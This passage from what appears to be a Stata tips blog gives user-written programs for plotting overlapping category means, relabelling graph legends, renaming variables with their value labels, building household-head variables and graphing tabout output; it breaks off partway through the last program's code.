Now, the three policy options are not mutually exclusive. It is possible to qualify under all three policy options, to be excluded under all three policy options, or to qualify under only one or two of the policy options. This is not true of the groups self-employed and not self-employed, and of the groups male and female. Essentially, suppose you want to combine the first three graphs below onto the same graph, as shown in the fourth graph:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVYt0EelUn1ljEeXoAJlB6gOVCoE_DdeGRcxkWkyA_3DPLB_g-HTZolEm0t_LQipU3aMkzAvzhumXIAKTLF1KJHpa2I9PipUqTwUAAc5BdMfF5SJdOHnbvjnNp4QFxg_WmDp1EDlntpUg/s1600/Graph_mean_11-14-2012_example_for_blogpost1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVYt0EelUn1ljEeXoAJlB6gOVCoE_DdeGRcxkWkyA_3DPLB_g-HTZolEm0t_LQipU3aMkzAvzhumXIAKTLF1KJHpa2I9PipUqTwUAAc5BdMfF5SJdOHnbvjnNp4QFxg_WmDp1EDlntpUg/s640/Graph_mean_11-14-2012_example_for_blogpost1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN-fuXyTdmSB6OqYfbh7pxJsLzTHkIjHZqVblh5htDM_venFGq-TFz0cmElcWHBaeJAS9WgMpjuXu1HEiPdFHwQNMl-6NvemCBoeVFqmyR5tVGYLHv9cfV0wd7MaVaH7x91H5fpH9WZ7s/s1600/Graph_mean_11-14-2012_example_for_blogpost2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN-fuXyTdmSB6OqYfbh7pxJsLzTHkIjHZqVblh5htDM_venFGq-TFz0cmElcWHBaeJAS9WgMpjuXu1HEiPdFHwQNMl-6NvemCBoeVFqmyR5tVGYLHv9cfV0wd7MaVaH7x91H5fpH9WZ7s/s640/Graph_mean_11-14-2012_example_for_blogpost2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMGyZjVrN-dfAIeXOOaRZhmWBaD6sB2t1-ODeRxVEntVHAuAWSiAZPpQVHSdazPOjbD2mwv5HvqOIK_LRL40BbQDlCwfr6sU-cB-S6RH28jZyMiRRF-3sWwi0NPIzA3x9EPGu-pD2IJ4/s1600/Graph_mean_11-14-2012_example_for_blogpost3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMGyZjVrN-dfAIeXOOaRZhmWBaD6sB2t1-ODeRxVEntVHAuAWSiAZPpQVHSdazPOjbD2mwv5HvqOIK_LRL40BbQDlCwfr6sU-cB-S6RH28jZyMiRRF-3sWwi0NPIzA3x9EPGu-pD2IJ4/s640/Graph_mean_11-14-2012_example_for_blogpost3.png" width="640" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLTIdxDv1jW2GLb-v3izza7DAw6lDoh207QdV5ybQUBYrUltteJwTpjLo7cXMuiTCHZlvzMECS-m2BRJcNS_3mkzj5p8XQvUWZ6VXWUEauxWIGwSysiEA9H0oBf0NuUnMTBZHn3y9Lns/s1600/Graph_mean_11-14-2012_example_for_blogpost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLTIdxDv1jW2GLb-v3izza7DAw6lDoh207QdV5ybQUBYrUltteJwTpjLo7cXMuiTCHZlvzMECS-m2BRJcNS_3mkzj5p8XQvUWZ6VXWUEauxWIGwSysiEA9H0oBf0NuUnMTBZHn3y9Lns/s640/Graph_mean_11-14-2012_example_for_blogpost.png" width="640" /></a></div>
<br />
<br />
The program below will do this. Make sure you have value labels defined for the categorical variables. Also note that:<br />
<br />
a) The value labels for each of the categorical variables should have the same numbering (e.g. they should all be 0, 1, 2 or all be 0, 2, 5. It should not be the case that one has 0, 1, 3 and the other has 1, 3, 4).<br />
<br />
b) The groups defined by the categorical variables will be plotted in the order that you specify them. So in the fourth graph above, the order is: current policy, alternative a, alternative b, since that is what is given in the option <span style="font-family: "Courier New",Courier,monospace;">catvarlist</span> below: <span style="font-family: "Courier New",Courier,monospace;">catvarlist("currentpolicy alternative_a alternative_b")</span><br />
<br />
c) You need to specify new value labels with the same numbering as the original value labels for the categorical variables. This is necessary for the plot to turn out nice (the spacing gets mucked up if I don't force this). You can do this in the <span style="font-family: "Courier New",Courier,monospace;">v() </span>option below. So the original value labels could be:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">current policy: 0 "non-exempt" 1 "exempt"</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alternative a: 0 "does not receive" 1 "receives"</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alternative b: 0 "Ineligible" 1 "eligible"</span><br />
<br />
You might want to relabel this using the <span style="font-family: "Courier New",Courier,monospace;">v()</span> option as follows:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">v(0 "non-beneficiary" 1 "beneficiary")</span><br />
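<br />
As a rough sketch of notes a) and c), the three categorical variables could be given value labels that share the numbering 0 and 1 before the program is called. The label names (lbl_currentpolicy, lbl_alternative_a, lbl_alternative_b) are hypothetical, and the label text is the one from the example above:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// hypothetical label names; all three labels use the same numbering (0 and 1)<br />
label define lbl_currentpolicy 0 "non-exempt" 1 "exempt"<br />
label define lbl_alternative_a 0 "does not receive" 1 "receives"<br />
label define lbl_alternative_b 0 "Ineligible" 1 "eligible"<br />
<br />
// attach each label to its categorical variable<br />
label values currentpolicy lbl_currentpolicy<br />
label values alternative_a lbl_alternative_a<br />
label values alternative_b lbl_alternative_b<br />
<br />
// check the numbering of each label before plotting<br />
label list lbl_currentpolicy lbl_alternative_a lbl_alternative_b</span><br />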
<br />
To generate the fourth graph:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. overlappingcatgraphmean pccd using "$WHO_KG_reports/eraseme.dta", gc(graph bar (asis)) catvarlist("currentpolicy alternative_a alternative_b") v(0 "Non-beneficiary" 1 "Beneficiary") over2options(lab(angle(0) labs(vsmall))) replace go(note(`"Source: Some data source "') asy asc title("Average consumption of groups within population") subtitle("Simulation of policy options") ytitle("Per capita HH consumption (LCU)", margin(medium)) legend(size(small)) blabel(total, format(%9.0fc))) </span><br />
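<br />
The program computes each mean with <span style="font-family: "Courier New",Courier,monospace;">svy: mean</span> rather than taking weights, so the survey design has to be declared with <span style="font-family: "Courier New",Courier,monospace;">svyset</span> before the call. A minimal sketch, assuming the sampling weight is expfact (the weight used in the other graph bar commands in this post) and that there is no further design information such as PSUs or strata:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// assumption: expfact is the sampling weight and the design has no PSUs or strata<br />
svyset [pweight=expfact]<br />
<br />
// the kind of estimate the program runs for each level of each categorical variable<br />
svy: mean pccd if currentpolicy == 1</span><br />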
<br />
To generate the first three graphs:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(currentpolicy) asy title("Mean annual consumption comparison") subtitle("Current Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(alternative_a) asy title("Mean annual consumption comparison") subtitle("Alternative A Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(alternative_b) asy title("Mean annual consumption comparison") subtitle("Alternative B Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<br />
The program:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define overlappingcatgraphmean<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 27 Nov 2012<br /> // I want to plot the mean of a variable over categorical variables on the same plot. Of course, these categorical variables will not be mutually exclusive between them (though they are within them)<br /> // "using" should specify a .dta file - this program will save a dataset<br /> // doesn't take weights - uses svy mean to calculate the mean<br /> //<br /> // You call it like this:<br /> //<br /> // overlappingcatgraphmean varname using "filename.dta", gc(graph bar (asis)) go(over(catvariablelabel, [over_subopts]) over(catvariablelevel, [over_subopts]) asc title("My Title") ...) catvarlist(categoricalvar1 categoricalvar2) replace<br /> // <br /> // Note that: <br /> // 1. 'catvariablelabel', 'catvariablelevel_n' 'catvariablelevel' must be entered exactly as is (without the quotes) - these are names of variables that the program creates<br /> // 2. the order in which you enter the over() options is up to you.<br /> // <br /> // UPDATE 12-07-2012: Best way is to call it with a long dataset like this: graph bar v, over(eligible) over(avg). 
Also note that I haven't tested whether this works with "if"<br /><br /> syntax varname using/ [if] [in], GCmd(string) GOptions(string asis) CATvarlist(varlist) Valuelabelsforlevels(string asis) [replace over1options(string asis) over2options(string asis) ]<br /> version 9.1<br /> marksample touse<br /> tempname tempmat<br /> tempname variablelabel<br /> local `variablelabel' : variable label `varlist' <br /> <br /> // foreach category, find the mean<br /> foreach catvar of local catvarlist {<br /> tempfile tf_`catvar'<br /> <br /> // this is a pain: get the name of the variable's value label<br /> tempname tn_`catvarvaluelabel' <br /> local `tn_`catvarvaluelabel'' : value label `catvar'<br /> label save ``tn_`catvarvaluelabel''' using `"`tf_`catvar''"', replace<br /> <br /> // UPDATE: None of this is necessary. The user will pass a list of value labels, separated by spaces, and these will be assumed to be the same for all the categorical variables specified<br /> // e.g. user can pass v(0 "Qualifies" 1 "Does not Qualify"), where the categorical variables and corresponding value lables are:<br /> // exempt : 0 "Exempt" 1 "Non-exempt"<br /> // PMT : 0 "Eligible" 1 "Non-eligible"<br /> // MBPF : 0 "Receives" 1 "Does not receive"<br /><br /> di "cat = `catvar'"<br /> tempname catvarlabel_`catvar'<br /> local `catvarlabel_`catvar'': variable label `catvar'<br /> tempname levels_`catvar'<br /> levelsof `catvar', local(`levels_`catvar'')<br /> foreach level of local `levels_`catvar'' {<br /> svy: mean `varlist' if `catvar' == `level' & `touse'<br /> matrix `tempmat' = r(table)<br /> tempname mean_`catvar'_`level'<br /> local `mean_`catvar'_`level'' = `tempmat'[1,1]<br /> tempname vl`catvar'_`level'<br /> local `vl`catvar'_`level'' : label (`catvar') `level' <br /> // di "Mean of var: ``mean_`catvar'_`level'''"<br /> }<br /> }<br /><br /> tempname valueslabels<br /> label define `valueslabels' `valuelabelsforlevels'<br /> tempfile tf_valuelabelsforlevels<br /> label save 
`valueslabels' using `"`tf_valuelabelsforlevels'"', replace<br /> <br /> // I'll now make a dataset out of this with the following variables: mean of the variable; category name; category level<br /> // The latter two will be numeric, categorical variables with variable labels attached.<br /> preserve<br /> clear<br /> do `"`tf_valuelabelsforlevels'"'<br /> gen meanofvariable = .<br /> label var meanofvariable `"``variablelabel''"'<br /> gen catvariablelabel = ""<br /> gen catvariablelevel = ""<br /> gen catvariablelevel_n = .<br /> gen sortorder = .<br /> <br /> // create the sort order - it will be the order in which the categorical variables were specified<br /> <br /> tempname count sortcount<br /> local `count' = 0<br /> local `sortcount' = 0<br /> foreach catvar of local catvarlist {<br /> // di "cat = `catvar'"<br /> local `sortcount' = ``sortcount'' + 1<br /> foreach level of local `levels_`catvar'' {<br /> local `count' = ``count'' + 1<br /> set obs ``count''<br /> replace meanofvariable = ``mean_`catvar'_`level''' in ``count''<br /> replace catvariablelabel = `"``catvarlabel_`catvar'''"' in ``count''<br /> replace catvariablelevel_n = `level' in ``count''<br /> replace catvariablelevel = `"``vl`catvar'_`level'''"' in ``count''<br /> replace sortorder = ``sortcount'' in ``count''<br /> <br /> // di "Mean of var: ``mean_`catvar'_`level'''"<br /> }<br /> }<br /> label values catvariablelevel_n `valueslabels'<br /> save `"`using'"', `replace'<br /> `gcmd' meanofvariable, over(catvariablelevel_n, sort(catvariablelevel_n) `over1options') over(catvariablelabel, sort(sortorder) `over2options') `goptions' <br /> restore<br /><br />end program<br /></span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-26133624566070816532012-11-27T02:10:00.003-08:002012-12-08T03:37:49.965-08:00Stata tip: fixing the legend on bar graphs to display variable labels instead of variable names<div dir="ltr" style="text-align: left;" trbidi="on">
Check out the legends on these two graphs (the first one is the problem legend, the second one is the better legend):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDoR1dSGBOBOI8nvdf0yCaEdC-ALH3WTHypgl7L2j53Ofn4tcqWGyjf-QVBAK5FhLm4fngVDm5gZJ_JUzz-LtAwMNBHrEms4BNYH1T9nuei4aEPWtAZOXmUatCZQnCbiMa4GlaHJ1LbBw/s1600/Graph_share_reporting_appliedmedassistance_hospitalized_exempt_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDoR1dSGBOBOI8nvdf0yCaEdC-ALH3WTHypgl7L2j53Ofn4tcqWGyjf-QVBAK5FhLm4fngVDm5gZJ_JUzz-LtAwMNBHrEms4BNYH1T9nuei4aEPWtAZOXmUatCZQnCbiMa4GlaHJ1LbBw/s640/Graph_share_reporting_appliedmedassistance_hospitalized_exempt_2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6pbs8qh51rm_F9lHSk52zrFwZ3IHBqS-H7d3P3HHRCsIHj3-USkLqhs6t2EQCmXFMbVBUrDsuKbDj6kss9YbPp6JCJmIdjgE1P79_Zb6kQC3Cy16kx4wY2a4p41MmkEZo_6MOmSYgFuI/s1600/Graph_share_reporting_appliedmedassistance_hospitalized_exempt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6pbs8qh51rm_F9lHSk52zrFwZ3IHBqS-H7d3P3HHRCsIHj3-USkLqhs6t2EQCmXFMbVBUrDsuKbDj6kss9YbPp6JCJmIdjgE1P79_Zb6kQC3Cy16kx4wY2a4p41MmkEZo_6MOmSYgFuI/s640/Graph_share_reporting_appliedmedassistance_hospitalized_exempt.png" width="640" /></a></div>
<br />
For the first one, I used the command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar (mean) appliedmed hospitalized [aw=expfact], over(exempt) ...</span><br />
<br />
and in the legend, it used "mean of [variable name]" instead of using the variable label. If you use the option <span style="font-family: "Courier New",Courier,monospace;">nolabel </span>with the <span style="font-family: "Courier New",Courier,monospace;">graph bar</span> command, you would just get "[variable name]" in the legend. How do you get Stata to use the variable labels in the legend instead of the variable names, like in the second graph above? (Note that, in the second graph, my program splits long variable labels over two lines, and makes the line break at a space, not in the middle of a word.) Use the following code:<br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. local vlist appliedmed hospitalized<br />. makelegendlabelsfromvarlabels `vlist', local(relabellegend) c(30)<br />. graph bar (mean) `vlist' [aw=expfact], over(exempt) title(`"Share reporting applied for medical assistance in the past 30 days"') ytitle("Fraction of group", margin(medium)) blabel(total, format(%9.2fc)) subtitle("Average for each group") legend(size(vsmall) `relabellegend') </span><br />
<br />
Where the program <span style="font-family: "Courier New",Courier,monospace;">makelegendlabelsfromvarlabels </span>is defined as below. In the above, the option c(30) tells Stata that the first line should have at most 30 characters (the break is made at a space), and that the rest of the variable label should be placed on the line below.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define makelegendlabelsfromvarlabels<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 25 Nov 2012<br /> //<br /> <br /> // Wrote it to fix an annoyance with graph bar. I want graph bar to use variable labels, not variable names, in the legend, but it won't do this if I am using a "(stat)" rather than "(asis)"<br /> syntax varlist, local(name local) [c(integer 30)]<br /> version 9.1<br /> <br /> // local charlength = 30<br /> <br /> tempname count<br /> local `count' = 0<br /> tempname labeloptions<br /> tempname variablelabel<br /> foreach var of local varlist {<br /> local `count' = ``count'' + 1<br /> local `variablelabel' : variable label `var'<br /> <br /> // It would be great to break this up at a word boundary if the length is > 34 characters<br /> if (length(`"``variablelabel''"') > `c') {<br /> tempname variablelabel_part1<br /> tempname variablelabel_part2<br /> tempname variablelabel_tochange<br /> tempname positionofspace<br /> tempname positionofspace_prev<br /> tempname exitwhileloop<br /> local `exitwhileloop' = 0<br /> local `positionofspace' = 0<br /> local `variablelabel_tochange' `"``variablelabel''"'<br /> while (``exitwhileloop'' == 0) {<br /> <br /> local `positionofspace' = strpos(`"``variablelabel_tochange''"', " ")<br /> if (``positionofspace'' >= `c' | ``positionofspace''==0) {<br /> local `exitwhileloop' = 1<br /> } <br /> else {<br /> local `positionofspace_prev' = ``positionofspace''<br /> local `variablelabel_tochange' = subinstr(`"``variablelabel_tochange''"'," ",".",1)<br /> }<br /> <br /> } <br /> <br /> local `variablelabel_part1' = substr(`"``variablelabel''"', 1, ``positionofspace_prev'')<br /> local `variablelabel_part2' = substr(`"``variablelabel''"', ``positionofspace_prev'' + 1, . 
)<br /> local `labeloptions' `"``labeloptions'' label(``count'' `"``variablelabel_part1''"' `"``variablelabel_part2''"') "'<br /> }<br /> else {<br /> local `labeloptions' `"``labeloptions'' label(``count'' `"``variablelabel''"') "'<br /> }<br /> }<br /> <br /> // di `"labeloptions: ``labeloptions''"'<br /> // need to return this in a local macro<br /> c_local `local' `"``labeloptions''"'<br /> <br /><br />end program</span><br />
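<br />
For comparison, here is a sketch of the kind of legend options that the local macro relabellegend is meant to hold, written out by hand. The label text is hypothetical (the actual variable labels are not shown in this post). Each quoted string inside <span style="font-family: "Courier New",Courier,monospace;">label()</span> goes on its own line in the legend:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// hypothetical variable labels, split over two lines by hand<br />
local relabellegend `"label(1 "Applied for medical assistance" "in the past 30 days") label(2 "Was hospitalized" "in the past 12 months")"'<br />
<br />
// the legend now shows the text above instead of "mean of [variable name]"<br />
graph bar (mean) appliedmed hospitalized [aw=expfact], over(exempt) legend(size(vsmall) `relabellegend')</span><br />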
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com4tag:blogger.com,1999:blog-2722671667390463266.post-19658475272065029422012-11-26T10:03:00.000-08:002012-12-03T00:17:07.577-08:00Stata tip: Rename the value label associated with a variable, when renaming said variable<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you have a dataset with the variable <span style="font-family: "Courier New",Courier,monospace;">a9</span>, and the value label associated with this is <span style="font-family: "Courier New",Courier,monospace;">a9</span> (or <span style="font-family: "Courier New",Courier,monospace;">gobledygook</span>, or whatever). You may want to change this variable name to something more telling, like <span style="font-family: "Courier New",Courier,monospace;">maritalstatus</span>. If you use<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">rename a9 maritalstatus</span><br />
<br />
the name of the value label remains a9. The following ado file will allow you to change both the variable name and the name of the value label at the same time:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">renamevarandvaluelabel a9 maritalstatus</span><br />
<br />
Now both the variable name and the name of the value label are <span style="font-family: "Courier New",Courier,monospace;">maritalstatus</span>. Note that the original value label can be named anything. For example, if the original value label was named <span style="font-family: "Courier New",Courier,monospace;">gobledygook</span>, it would still be changed to <span style="font-family: "Courier New",Courier,monospace;">maritalstatus</span>.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define renamevarandvaluelabel<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 25 Nov 2012<br /><br /> // This program renames the variable and the value label. Usage:<br /> // renamevarandvaluelabel originalvarname newvarname<br /> // What it does:<br /> // rename originalvarname newvarname<br /> // and it changes the name of the value label of originalvarname to newvarname. <br /> // Note that if there is already a value label named newvarname, the program stops without changing anything.<br /><br /> // syntax anything(id="variable and values" name=arguments)<br /> syntax anything(id="original and new label name" name=labelnames)<br /> version 9.1<br /> <br /> // steps:<br /> // 1. stop if a label with the new label name already exists<br /> // 2. create the new label from the old label<br /> // 3. apply this new label to variable <br /> <br /> // di "labelnames = `labelnames'"<br /> <br /> foreach item of local labelnames {<br /> // di `"item = `item'"'<br /> }<br /> <br /> tempname originallabelname<br /> tempname originalvarname <br /> local `originalvarname' : word 1 of `labelnames'<br /> tempname newvarandlabelname <br /> local `newvarandlabelname' : word 2 of `labelnames'<br /> <br /> // Step 1. check whether a label with the new label name already exists. If it does, quit the program<br /> cap label list ``newvarandlabelname''<br /> if (_rc == 0) {<br /> // compound double quotes are needed here because the message itself contains double quotes<br /> di `"That label (``newvarandlabelname'') already exists. You can use the command "renamevaluelabel [oldlabelname] [newlabelname]" written by Shafique Jamal (shafique.jamal@gmail.com) to change that value label name. Exiting"'<br /> exit<br /> }<br /> <br /> // Step 2. create the new label from the old label. First need to get the name of the value label of the original variable name. 
Do this only if there is a value label attached<br /> local `originallabelname' : value label ``originalvarname''<br /> if ("``originallabelname''"~="" & "``originallabelname''"~=" ") {<br /> <br /> di "There is an existing label"<br /> label copy ``originallabelname'' ``newvarandlabelname''<br /> <br /> // Step 3. rename the variable, then attached the new variable label<br /> rename ``originalvarname'' ``newvarandlabelname''<br /> label values ``newvarandlabelname'' ``newvarandlabelname''<br /> }<br /> else { // Just rename the variable, forget about the value label, if there is no original value label <br /> <br /> di "No existing label"<br /> rename ``originalvarname'' ``newvarandlabelname''<br /> }<br /> <br /> <br />end</span><br />
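<br />
Done by hand, the steps in the program look roughly like the sketch below. It assumes that a9 has a value label attached and that no value label named maritalstatus exists yet. Note that the original value label definition is copied, not dropped:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// manual equivalent of: renamevarandvaluelabel a9 maritalstatus<br />
// assumption: a9 has a value label attached, and no label named maritalstatus exists<br />
local oldlabel : value label a9<br />
label copy `oldlabel' maritalstatus<br />
rename a9 maritalstatus<br />
label values maritalstatus maritalstatus<br />
<br />
// check: the "value label" column should now read maritalstatus<br />
describe maritalstatus</span><br />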
<br />
<br />
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-37766854852549449112012-11-26T09:56:00.003-08:002012-12-03T00:17:22.632-08:00Stata tip: Easy and short way to generate household head variables for individual-level datasets<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you have an individual-level dataset (so you have a dataset with data on multiple members in the household), and you want to generate a variable that says something about the household head (e.g. household head is male, or is unemployed, etc.). This program will allow you to do so with just one command:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">program define genhhhcharacteristics<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com).<br /> // For an individual level dataset (includes multiple household members, not just the household head), generates a variable indicating a characteristic of the household head<br /> // e.g. suppose you want to generate a new variable (hhh_male) indicating the gender of the household head, and the variable identifying the household head is "reltohead", with 1 being the head,<br /> // and you want to do it by hhid of course. You would use the following command:<br /> // <br /> // genhhhcharacteristics male, b(hhid) gen(hhh_male) h(reltohead) id(1)<br /> //<br /> // The above would be the equivalent of doing the following:<br /> // gen hhh_male_interm = male if reltohead == 1<br /> // bys hhid: egen hhh_male = max(hhh_male_interm)<br /> // drop hhh_male_interm<br /> // And then copying the value label and a modified variable label over to the new household head variable <br /> // <br /><br /> syntax varname, Byvariables(varlist) GENerate(name) Headvariable(varname) [IDofhead(integer 1) ] <br /> version 9.1<br /><br /> tempvar intermediaryvariable<br /> gen `intermediaryvariable' = `varlist' if `headvariable' == `idofhead'<br /> bys `byvariables': egen `generate' = max(`intermediaryvariable')<br /> <br /> // Now copy the value label over, if there is one<br /> tempname valuelabel<br /> local `valuelabel' : value label `varlist'<br /> if ("``valuelabel''"~="" & "``valuelabel''"~=" ") {<br /> <br /> // di "There is an existing label"<br /> label values `generate' ``valuelabel''<br /> }<br /> <br /> // Copy over also the variable label<br /> tempname variablelabel<br /> local `variablelabel' : variable label `varlist'<br /> label var `generate' `"``variablelabel'' (For `headvariable' == `idofhead', by `byvariables')"'<br /> <br />end program</span><br />
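<br />
To see what the core of the program does, here is a small sketch on made-up data. The four observations are invented for illustration; the variable names (hhid, reltohead, male) follow the example in the program's comments:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">// toy data, invented for illustration: two households with two members each<br />
clear<br />
input hhid reltohead male<br />
1 1 1<br />
1 2 0<br />
2 1 0<br />
2 3 1<br />
end<br />
<br />
// keep the characteristic only for the head, then spread it to all household members<br />
gen hhh_male_interm = male if reltohead == 1<br />
bysort hhid: egen hhh_male = max(hhh_male_interm)<br />
drop hhh_male_interm<br />
<br />
// hhh_male is 1 for both members of household 1 and 0 for both members of household 2<br />
list, sepby(hhid)</span><br />
<br />
This works because <span style="font-family: "Courier New", Courier, monospace;">egen</span>'s <span style="font-family: "Courier New", Courier, monospace;">max()</span> ignores the missing values that non-heads get in the intermediate variable.<br />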
<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-67113232526019720002012-11-23T15:58:00.001-08:002012-12-07T11:24:07.695-08:00Stata tip: plotting the output of the tab function<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;">UPDATE2: I updated this to allow for "if" and "in" </span><br />
<br />
<span style="font-family: inherit;">UPDATE: I updated this to preserve the value labels. So var2 (the second variable in your variable list) must have a value label attached to it. </span><br />
<br />
<span style="font-family: inherit;">Suppose you want to plot the output of a two-way tab command. Here is a program that will do it (see below). It is actually a wrapper for the tabout command. Some notes about the options:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">using: put here the name of the file that you want to save the tabout data to, in tab separated format. The graphs that this command produces will be saved using the same filename but with a different extension.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">gc: this stands for graph command. You can use gc("graph bar"), gc("graph hbar")... and maybe others</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">go: this stands for graph options. These are the options that you would use for the graph command above (e.g. note, title, b1title, subtitle, etc)</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">ta: this stands for tabout options. These are the options you would use with the tabout command (e.g. c(), f(), etc.) </span><br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">taboutgraph var1 var2 [aw=weight] using "filename_to_savedatato.csv", gc("graph bar") ta(cells(col) f(2 2 2 2)) replace go( note("Source: XXX") b1title("Quintile") title(`"Composition of Population"') ytitle("Percent of population in the quintile"))</span><br />
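<br />
The program calls tabout and labellist, which are user-written commands and not part of official Stata. A sketch of installing them, assuming both are still distributed on SSC under these names:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">// assumption: both packages are available from SSC under these names<br />
ssc install tabout<br />
ssc install labellist<br />
<br />
// confirm that Stata can find both commands<br />
which tabout<br />
which labellist</span><br />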
<br />
Code<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">program define taboutgraph<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com)<br /> // This program requires that the second variable in varlist have a value label attached to it<br /> // It plots the column output of the tabout command<br /><br /> syntax varlist(min=2 max=2) [if] [in] using/ [aweight], GCmd(string) GOptions(string asis) TAboutoptions(string asis) [replace overcategorysuboptions(string asis) overxsuboptions(string asis)]<br /> version 9.1<br /> marksample touse<br /> // di `"`0'"'<br /> cap drop _v*<br /> // cap ssc install lstrfun<br /> <br /> // first generate the table<br /> tabout `varlist' [`weight'`exp'] if `touse' using `using', `replace' `taboutoptions'<br /> di `"tabout [`weight'`exp'] `varlist' if `touse' using `using', `replace'"'<br /> local number_of_rows = r(r)<br /> local number_of_columns = r(c)<br /> return list<br /> <br /> // get the filename<br /> di `"regexm:"'<br /> di regexm(`"`using'"',`"((.*)\.(.+))$"')<br /> if (regexm(`"`using'"',`"((.*)\.(.+))$"')) {<br /> local pathtofile_original = regexs(1)<br /> local pathtofile_withoutextension = regexs(2)<br /> local pathtofile_extension = regexs(3)<br /> }<br /> di `"pathtofile_original:`pathtofile_original'"'<br /> di `"pathtofile_withoutextension:`pathtofile_withoutextension'"'<br /> di `"pathtofile_extension:`pathtofile_extension'"'<br /> // open the file and process it.<br /> <br /> local count = 0<br /> tempname fhr<br /> tempname fhw<br /> tempfile tf<br /> file open `fhr' using `"`pathtofile_original'"', r<br /> <br /> // ---------------------------<br /> // file open `fhw' using `"$WHO_KG_reports/tempfile.csv"', t write all replace<br /> file open `fhw' using `"`tf'"', t write all replace<br /> <br /> local count = `count' + 1<br /><br /> // First line is variable label.<br /> file read `fhr' line<br /> return list<br /> local count = 1<br /> while r(eof)==0 {<br /> local count = `count' + 1<br 
